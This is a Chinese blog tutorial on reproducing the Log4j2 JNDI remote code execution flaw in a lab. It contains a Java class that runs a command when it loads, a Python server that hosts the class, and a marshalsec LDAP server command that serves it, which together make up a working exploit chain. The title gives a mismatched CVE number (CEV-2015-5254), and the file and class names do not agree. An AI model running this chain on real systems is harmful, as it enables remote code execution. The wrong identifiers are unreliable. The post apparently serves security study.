漏洞复现-Log4j2远程代码执行漏洞(CEV-2015-5254)

已于 2022-06-27 16:29:52 修改
阅读量3.7k 收藏 1
点赞数
分类专栏: web安全 漏洞复现 文章标签: 安全
于 2021-12-15 14:26:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59350385/article/details/121950607
版权

目录 

Windows环境搭建

ubuntu环境搭建

攻击复现

Windows环境搭建

1.安装java1.8版本

2.打开受影响版本的jar包,文件放在了百度网盘中,请自取
链接:百度网盘 请输入提取码
提取码:c4qy

ubuntu环境搭建

 1.安装默认JRE / JDK

        接下来,检查是否已安装Java:java -version

        如果当前未安装Java,您将看到以下输出:

        执行以下命令安装OpenJDK: 

 $ sudo apt install default-jre

        除了JRE之外,您可能还需要Java Development Kit(JDK)才能编译和运行某些特定的基于 Java的软件。要安装JDK,请执行以下命令,该命令还将安装JRE:

 $ sudo apt install default-jdk

 2.下载marshalsec(或者用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)

   git clone https://github.com/mbechler/marshalsec.git

3.下载maven

sudo apt-get install maven

4.编译marshalsec

 mvn clean package -DskipTests

5.恶意代码文件calc.java,功能是在windows中执行calc命令,弹出计算器

import java.lang.Runtime;
import java.lang.Process;
public class robots{
	static {
		try {
			Runtime rt = Runtime.getRuntime();
			String[] commands = {"calc"};
			Process pc = rt.exec(commands);
			pc.waitFor();
			} catch (Exception e) {
			// do nothing
			}
		}
	}

6.编译文件:javac calc.java

 7.用python搭建http服务传输class文件

python -m SimpleHTTPServer 8080

8.进入marshalsec下的target目录启动一个LDAP服务器,监听9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://[ip]/#calc" 9999

 命令中的ip填刚才搭建http服务的ip地址和端口,calc就是class类名

攻击复现

1.运行代码,相当于往日志中写入恶意代码

_s1mple
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
几个cve漏洞库查询网站-什么是CVE?常见漏洞和暴露列表概述
学习 记录 总结 分享
03-17 8536
CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,虽然这些工具很难整合在一起。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题。原文链接:https://blog.csdn.net/zhongxj183/article/details/119456735。tenable漏洞库(nessus)
log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)
hldfight
12-23 1万+
0x00 前言 自从log4j2.14.1版本爆出漏洞后,官方截止目前为止,共发布了3个稳定版本,分别是15.0、16.0、17.0。 本篇文章就分析一下每个版本都做了哪些事情,以此来评估每个版本升级的必要性。 0x01 2.15.0版本 1.1 修复方案 此版本是为了修复最初的 CVE-2021-44228漏洞,它的修复方式总结如下: 1、默认禁用msg lookup功能 2、在org.apache.logging.log4j.core.net.JndiManager#lookup方法中限制了ldap服务
论文研究 - CEV型Heston模型的Malliavin可微性
05-15
众所周知,Malliavin演算可以应用于具有Lipschitz连续系数的随机微分方程,以阐明解的存在性和平滑性。 本文将Malliavin演算应用于扩散系数为非Lipschitz连续的CEV型Heston模型,并证明了该模型的Malliavin可微性。
weblogic-CEV反序列化补丁p28483404安装升级方法安装升级指导
01-11
WEBLOGIC-CEV反系列化漏洞是常风的高危漏洞。可以远程通过漏洞执行恶意代码,上传文件,此漏洞扫描会经常扫出,所以必须进行安全加固,具体安全加固方法见文档,里面有具体说明步骤,简单的几步就可以解决这个漏洞,本人在生产环境亲自安装升级过才发出来的,给大家做参考
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2431
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本
10-09
亲测好用.nginx-1.13.3,nginx1.13.3不存在信息泄漏漏洞安全稳定nginx版本,不存在漏洞 nginx-1.13.3 nginx1.13.3 安全稳定 nginx版本
rehl4.X,5.X,6.X bash升级包 针对漏洞CEV-2014-6271
10-14
每个相应版本对应bash rpm两个一个64位一个32位 官网下载 可以对照MD5 软件列表: bash-3.0-27.el4.i386.rpm bash-3.0-27.el4.x86_64.rpm bash-3.2-33.el5_11.4.i386.rpm bash-3.2-33.el5_11.4.x86_64.rpm ...
weblogic-CEV反序列化补丁p28483404_BHT3反序列化补丁
01-11
weblohic-CEV-安全漏洞补丁,p28483404_BHT3反序列化补丁-CVE-2017-2018 是weblogic wls-wsat组件的一个xml反序列化漏洞补丁,该漏洞可造成远程命令执行。下载part1,part2再加上补丁文档就可以搞定
Citrix ADC(CVE-2023-3519)版本升级包
07-27
Citrix ADC(CVE-2023-3519)版本升级包。 可在命令行升级修复Citrix Netscalerloudong
浅谈漏洞来源(CVE,NVD,CNVD,CNNVD)
热门推荐
TT成长博客
02-23 2万+
网络安全人士可能会问这样一个问题,安全漏洞是哪里来的,什么渠道,可靠吗。那么多的安全产品,他们的漏洞库都是自己整理的吗?(怎么可能撒),虽然各安全厂商都搞自己的威胁情报中心,但是威胁情报除了自研的,很多还是靠类似公益的机构来支持,比如业界大家都知道的几个平台,我们就简单和大家掰扯掰扯吧。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6351
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
java 1.8.0 安全_RedHat安全更新修复OpenJDK1.8.0版本漏洞
weixin_32017501的博客
03-04 1343
综述RedHat发布安全补丁通告,修复了多个java-1.8.0-openjdk的安全问题。相关链接:https://access.redhat.com/errata/RHSA-2018:0095漏洞概述在OpenJDK的Hotspot和AWT组件中发现了多个缺陷。不可信的Java应用程序或小程序可以使用这些漏洞绕过某些Java沙箱限制。(CVE-2018-2582,CVE-2018-2641)...
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 5989
log4j 漏洞CVE-2021-44228 漏洞复现
weblogic反序列化漏洞打补丁
qq_28156305的博客
08-02 1711
针对反序列化漏洞之前的weblogic-CVE-2018-2628与最近的weblogic-CVE-2018-2893,Oracle官方7月才给出最新的升级包,并修复漏洞,我的环境weblogic12c 2.3.1,jdk1.8,下面说一下升级方法: 下载补丁文件:p27912627_122130_Generic.zip(下载是收费的,可以找DBA相关同事帮忙下载) 服务器解压文件:解压后目录...
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2669
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Log4J2远程代码执行漏洞复现(CVE-2021-44228)
box
04-18 8324
Log4J代码执行漏洞复现(CVE-2021-44228) 受影响版本log4j版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 受影响的应用及组件:Apache Solr、Apache Struts2、Apache Flink、Apache Druid、spring-boot-strater-log4j2、ElasticSearch、Apache Flume、Dubbo、Redis、Logstash、Apache Kafka等 复现环境:java ver
log4j2 常用配置(直接拷贝进项目即可)
weixin_42605169的博客
03-25 131
<?xml version="1.0" encoding="UTF-8"?> ...
复现】Apache Log4j2 远程代码执行漏洞
趣学程序
12-14 865
Apache Log4j2 远程代码执行漏洞 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞影响版本: 2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 复现 仅个人学习总结 效果 MyServer.java package server;
cev-2015-8660
最新发布
01-07
CEV-2015-8660是欧洲排球联赛(CEV)于2015年发布的一项文件编号。根据CEV官方规定,文件编号CEV-2015-8660可能是有关比赛赛程安排、参赛规则、技术规定或其他与排球比赛相关的文件。这些文件通常用于指导和管理欧洲...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值